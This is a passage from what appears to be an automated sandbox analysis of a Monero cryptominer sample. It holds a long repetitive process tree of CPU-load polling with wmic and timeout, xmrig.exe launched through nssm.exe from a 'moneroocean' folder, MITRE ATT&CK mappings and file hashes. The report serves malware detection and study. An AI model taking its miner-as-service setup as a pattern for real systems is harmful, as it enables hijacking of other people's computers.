                                                                                                                                                                          2⤵
                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                          PID:3760
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2960
                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:1224
                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                              timeout /t 1
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                              PID:4660
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:3200
                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:316
                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                  timeout /t 1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:1672
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:3768
                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2520
                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:3100
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4672
                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2776
                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                          timeout /t 1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                          PID:3328
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1444
                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2212
                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                              timeout /t 1
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                              PID:1324
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2584
                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:2984
                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                  timeout /t 1
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                  PID:4368
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4744
                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1148
                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                      PID:3316
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4084
                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3140
                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                          timeout /t 1
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                          PID:516
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4032
                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:1764
                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                              timeout /t 1
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                              PID:4884
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:1408
                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:1488
                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                  timeout /t 1
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                  PID:5084
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:2060
                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:208
                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                      PID:1500
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4840
                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:5056
                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                          timeout /t 1
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                          PID:3528
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4352
                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5044
                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                              timeout /t 1
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                              PID:1432
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2712
                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2260
                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                  timeout /t 1
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                  PID:4108
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:656
                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4500
                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                      PID:4808
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2284
                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1564
                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                          timeout /t 1
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                          PID:2016
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4660
                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:1656
                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                              timeout /t 1
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:1012
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:3816
                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4584
                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                    PID:4496
                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:220
                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:828
                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                        PID:3936
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:4752
                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:2056
                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                            PID:1124
                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:2264
                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:5024
                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                PID:2896
                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:8
                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:3556
                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                    PID:4672
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:3872
                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4972
                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                        timeout /t 1
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                        PID:4728
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:2212
                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                            wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:4724
                                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                            timeout /t 1
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4736
                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:2984
                                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:4460
                                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                  timeout /t 1
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                  PID:1928
                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:4664
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:3316
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                      PID:1412
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:2052
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:532
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                          timeout /t 1
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                          PID:1192
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:1764
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:1824
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                              timeout /t 1
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                              PID:4720
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:340
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:5072
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                  timeout /t 1
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                  PID:4424
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:216
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:232
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                      timeout /t 1
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                      PID:1500
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:4232
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:1388
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                          timeout /t 1
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:1468
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:1300
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:4804
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                timeout /t 1
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                PID:4868
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:1432
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                    wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:3352
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                    PID:2692
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:4212
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:2712
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      PID:3688
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\moneroocean\xmrig.exe"
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                        PID:3056

                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                                    System Services

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1569

                                                                                                                                                                                                                                                                                                                    Service Execution

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1569.002

                                                                                                                                                                                                                                                                                                                    Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1059

                                                                                                                                                                                                                                                                                                                    PowerShell

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1059.001

                                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                                    Create or Modify System Process

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1543

                                                                                                                                                                                                                                                                                                                    Windows Service

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1543.003

                                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                                    Create or Modify System Process

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1543

                                                                                                                                                                                                                                                                                                                    Windows Service

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1543.003

                                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                                    Impair Defenses

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1562

                                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                                    Impact

                                                                                                                                                                                                                                                                                                                    Service Stop

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1489

                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      5b5352c55a8e79ac8de4be3202d496a1

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      4a263d9e36e5ef972e4b19035cae169e1df6459c

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      bc95d87be7cf5e05ccf6c04c485c1d12

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      a6c7f6425ca815600a228f860d7f71f96983da59

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      a3cead1dc43ddda217495e8e4b182f033f69104823baadd4a47d0f82390cab56

                                                                                                                                                                                                                                                                                                                      SHA512

